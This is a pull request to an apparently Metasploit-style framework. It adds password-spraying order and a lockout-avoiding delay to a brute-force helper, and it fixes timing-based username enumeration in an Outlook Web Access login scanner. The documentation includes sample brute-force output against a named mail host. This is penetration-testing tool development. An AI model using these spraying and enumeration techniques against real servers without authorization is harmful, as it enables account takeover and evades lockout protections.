### PR TITLE
owa_login and auth_brute Enhancements

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/owa_login.md
+++ b/documentation/modules/auxiliary/scanner/http/owa_login.md
@@ -1,0 +1,60 @@
+This module tests credentials on OWA 2003, 2007, 2010, 2013, and 2016 servers.
+
+NOTE: This module assumes that login attempts that take a long time (>1 sec) to
+return are using a valid domain username. This methodology does not work when
+passing a full email address (user@domain.com). Full email addresses will not
+be saved as potentially valid usernames unless we get a successful login.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/owa_login```
+2. Do: ```set RHOSTS [IP]```
+3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/owa_login) > run
+
+[*] webmail.hostingcloudapp.com:443 OWA - Testing version OWA_2013
+[+] Found target domain: HOSTINGCLOUDAPP
+[*] webmail.hostingcloudapp.com:443 OWA - Trying administrator : password
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.24
+[+] server type: EXCH2016MBX02
+[*] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.267791 'HOSTINGCLOUDAPP\administrator' : 'password': SAVING TO CREDS
+[*] webmail.hostingcloudapp.com:443 OWA - Trying administrator : password1
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.24
+[+] server type: EXCH2016MBX02
+[*] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.273841 'HOSTINGCLOUDAPP\administrator' : 'password1': SAVING TO CREDS
+[*] webmail.hostingcloudapp.com:443 OWA - Trying administrator : fido
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.22
+[+] server type: EXCH2016MBX01
+[*] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.270796 'HOSTINGCLOUDAPP\administrator' : 'fido': SAVING TO CREDS
+[*] webmail.hostingcloudapp.com:443 OWA - Trying johndoe : password
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.22
+[+] server type: EXCH2016MBX01
+[-] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN. 2.046935 'HOSTINGCLOUDAPP\johndoe' : 'password' (HTTP redirect with reason 2)
+[*] webmail.hostingcloudapp.com:443 OWA - Trying johndoe : password1
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.24
+[+] server type: EXCH2016MBX02
+[-] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN. 2.073391 'HOSTINGCLOUDAPP\johndoe' : 'password1' (HTTP redirect with reason 2)
+[*] webmail.hostingcloudapp.com:443 OWA - Trying johndoe : fido
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.24
+[+] server type: EXCH2016MBX02
+[-] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN. 2.038717 'HOSTINGCLOUDAPP\johndoe' : 'fido' (HTTP redirect with reason 2)
+[*] webmail.hostingcloudapp.com:443 OWA - Trying bob : password
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.24
+[+] server type: EXCH2016MBX02
+[*] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.289186 'HOSTINGCLOUDAPP\bob' : 'password': SAVING TO CREDS
+[*] webmail.hostingcloudapp.com:443 OWA - Trying bob : password1
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.24
+[+] server type: EXCH2016MBX02
+[*] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.270616 'HOSTINGCLOUDAPP\bob' : 'password1': SAVING TO CREDS
+[*] webmail.hostingcloudapp.com:443 OWA - Trying bob : fido
+[*] webmail.hostingcloudapp.com:443 OWA - Resolved hostname 'webmail.hostingcloudapp.com' to address 38.126.136.24
+[+] server type: EXCH2016MBX02
+[*] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.275251 'HOSTINGCLOUDAPP\bob' : 'fido': SAVING TO CREDS
+[*] Auxiliary module execution completed
+
+```

--- a/lib/msf/core/auxiliary/auth_brute.rb
+++ b/lib/msf/core/auxiliary/auth_brute.rb
@@ -32,6 +32,7 @@ module Auxiliary::AuthBrute
       OptBool.new('REMOVE_USER_FILE', [ true, "Automatically delete the USER_FILE on module completion", false]),
       OptBool.new('REMOVE_PASS_FILE', [ true, "Automatically delete the PASS_FILE on module completion", false]),
       OptBool.new('REMOVE_USERPASS_FILE', [ true, "Automatically delete the USERPASS_FILE on module completion", false]),
+      OptBool.new('PASSWORD_SPRAY', [true, "Reverse the credential pairing order. For each password, attempt every possible user.", false]),
       OptInt.new('MaxGuessesPerService', [ false, "Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.", 0]), # Tracked in @@guesses_per_service
       OptInt.new('MaxMinutesPerService', [ false, "Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.", 0]), # Tracked in @@brute_start_time
       OptInt.new('MaxGuessesPerUser', [ false, %q{
@@ -422,9 +423,17 @@ module Auxiliary::AuthBrute
     elsif user_array.empty?
       combined_array = pass_array.map {|p| ["",p] }
     else
-      user_array.each do |u|
+      if datastore['PASSWORD_SPRAY']
         pass_array.each do |p|
-          combined_array << [u,p]
+          user_array.each do |u|
+            combined_array << [u,p]
+          end
+        end
+      else
+        user_array.each do |u|
+          pass_array.each do |p|
+            combined_array << [u,p]
+          end
         end
       end
     end

--- a/lib/msf/core/auxiliary/auth_brute.rb
+++ b/lib/msf/core/auxiliary/auth_brute.rb
@@ -33,6 +33,7 @@ module Auxiliary::AuthBrute
       OptBool.new('REMOVE_PASS_FILE', [ true, "Automatically delete the PASS_FILE on module completion", false]),
       OptBool.new('REMOVE_USERPASS_FILE', [ true, "Automatically delete the USERPASS_FILE on module completion", false]),
       OptBool.new('PASSWORD_SPRAY', [true, "Reverse the credential pairing order. For each password, attempt every possible user.", false]),
+      OptInt.new('TRANSITION_DELAY', [false, "Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)", 0]),
       OptInt.new('MaxGuessesPerService', [ false, "Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.", 0]), # Tracked in @@guesses_per_service
       OptInt.new('MaxMinutesPerService', [ false, "Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.", 0]), # Tracked in @@brute_start_time
       OptInt.new('MaxGuessesPerUser', [ false, %q{
@@ -176,6 +177,7 @@ module Auxiliary::AuthBrute
       initialize_class_variables(this_service,credentials)
     end
 
+    prev_iterator = nil
     credentials.each do |u, p|
       # Explicitly be able to set a blank (zero-byte) username by setting the
       # username to <BLANK>. It's up to the caller to handle this if it's not
@@ -194,6 +196,19 @@ module Auxiliary::AuthBrute
 
       next if @@credentials_skipped[fq_user]
       next if @@credentials_tried[fq_user] == p
+
+      # Used for tracking if we should TRANSITION_DELAY
+      # If the current user/password values don't match the previous iteration we know
+      # we've made it through all of the records for that iteration and should start the delay.
+      if ![u,p].include?(prev_iterator)
+        unless prev_iterator.nil? # Prevents a delay on the first run through
+          if datastore['TRANSITION_DELAY'] > 0
+            vprint_status("Delaying #{datastore['TRANSITION_DELAY']} minutes before attempting next iteration.")
+            sleep datastore['TRANSITION_DELAY'] * 60
+          end
+        end
+        prev_iterator = datastore['PASSWORD_SPRAY'] ? p : u # Update the iterator
+      end
 
       ret = block.call(u, p)
 

--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -302,14 +302,16 @@ class MetasploitModule < Msf::Auxiliary
 
     if res.redirect?
       if elapsed_time <= 1
-        report_cred(
-          ip: res.peerinfo['addr'],
-          port: datastore['RPORT'],
-          service_name: 'owa',
-          user: user
-        )
-        print_status("#{msg} FAILED LOGIN, BUT USERNAME IS VALID. #{elapsed_time} '#{user}' : '#{pass}': SAVING TO CREDS")
-        return :Skip_pass
+        unless user =~ /@\w+\.\w+/
+          report_cred(
+            ip: res.peerinfo['addr'],
+            port: datastore['RPORT'],
+            service_name: 'owa',
+            user: user
+          )
+          print_status("#{msg} FAILED LOGIN, BUT USERNAME IS VALID. #{elapsed_time} '#{user}' : '#{pass}': SAVING TO CREDS")
+          return :Skip_pass
+        end
       else
         vprint_error("#{msg} FAILED LOGIN. #{elapsed_time} '#{user}' : '#{pass}' (response was a #{res.code} redirect)")
         return :skip_pass
@@ -328,14 +330,16 @@ class MetasploitModule < Msf::Auxiliary
       return :next_user
     else
       if elapsed_time <= 1
-        report_cred(
-          ip: res.peerinfo['addr'],
-          port: datastore['RPORT'],
-          service_name: 'owa',
-          user: user
-        )
-        print_status("#{msg} FAILED LOGIN, BUT USERNAME IS VALID. #{elapsed_time} '#{user}' : '#{pass}': SAVING TO CREDS")
-        return :Skip_pass
+        unless user =~ /@\w+\.\w+/
+          report_cred(
+            ip: res.peerinfo['addr'],
+            port: datastore['RPORT'],
+            service_name: 'owa',
+            user: user
+          )
+          print_status("#{msg} FAILED LOGIN, BUT USERNAME IS VALID. #{elapsed_time} '#{user}' : '#{pass}': SAVING TO CREDS")
+          return :Skip_pass
+        end
       else
         vprint_error("#{msg} FAILED LOGIN. #{elapsed_time} '#{user}' : '#{pass}' (response body did not match)")
         return :skip_pass

--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -254,14 +254,16 @@ class MetasploitModule < Msf::Auxiliary
       else
         # Login didn't work. no point in going on, however, check if valid domain account by response time.
         if elapsed_time <= 1
-          report_cred(
-            ip: res.peerinfo['addr'],
-            port: datastore['RPORT'],
-            service_name: 'owa',
-            user: user
-          )
-          print_status("#{msg} FAILED LOGIN, BUT USERNAME IS VALID. #{elapsed_time} '#{user}' : '#{pass}': SAVING TO CREDS")
-          return :Skip_pass
+          unless user =~ /@\w+\.\w+/
+            report_cred(
+              ip: res.peerinfo['addr'],
+              port: datastore['RPORT'],
+              service_name: 'owa',
+              user: user
+            )
+            print_status("#{msg} FAILED LOGIN, BUT USERNAME IS VALID. #{elapsed_time} '#{user}' : '#{pass}': SAVING TO CREDS")
+            return :Skip_pass
+          end
         else
           vprint_error("#{msg} FAILED LOGIN. #{elapsed_time} '#{user}' : '#{pass}' (HTTP redirect with reason #{reason})")
           return :Skip_pass


### PR DESCRIPTION
This PR adds a couple of new advanced options to `Auxilliary::AuthBrute` and fixes a bug in the `auxiliary/scanner/http/owa_login` module.

A new advanced option, `PASSWORD_SPRAY` switches the logic for creating the username/password matrix. It reverses the default behavior, and tries each password from the list against each user, before moving on to the next password. This can help test commonly used passwords against known valid user accounts.

e.g. `user1:password1`, `user2:password1`, `user3:password1`, `user1:password2`, `user2:password2` ...

The second new advanced option is `TRANSITION_DELAY`. This allows the user to customize a time period, in minutes, to wait before starting the new "transition" in the username/password list. This is helpful if you are password spraying and want don't want to lock the user accounts out when moving on to the next password in the list.

e.g. `user1:password1`, `user2:password1`, `user3:password1`, `sleep 15 minutes`, `user1:password2`, `user2:password2` ...

It also fixes a bug in `owa_login` that was incorrectly flagging user accounts as valid even when they did not exist on the server. The module includes a timing attack that checks the return time of a failed request. Due to the behavior of Exchange, you can tell if the user is valid or not based on the amount of time it takes for the server to return a failure response. The behavior changes when using full email addresses as the username value as it will always return quickly regardless  of if the username is valid or not.

## Verification
- [x] `use auxiliary/scanner/http/owa_login`
- [x] `set RHOST mymail.mindshiftonline.com`
- [x] Create a user file and password file and `set USER_FILE` and `set PASS_FILE`. Include at least 1 email address in the USER_FILE
- [x] `set PASSWORD_SPRAY true`
- [x] `set TRANSITION_DELAY 1`
- [x] `run`
- [x] Verify the username/password combination matches the above behavior for PASSWORD_SPRAY
- [x] Verify that there is a 1 minute delay when the list switches to the next password.
- [x] Verify that the email address in your USER_FILE is not marked as a valid user.


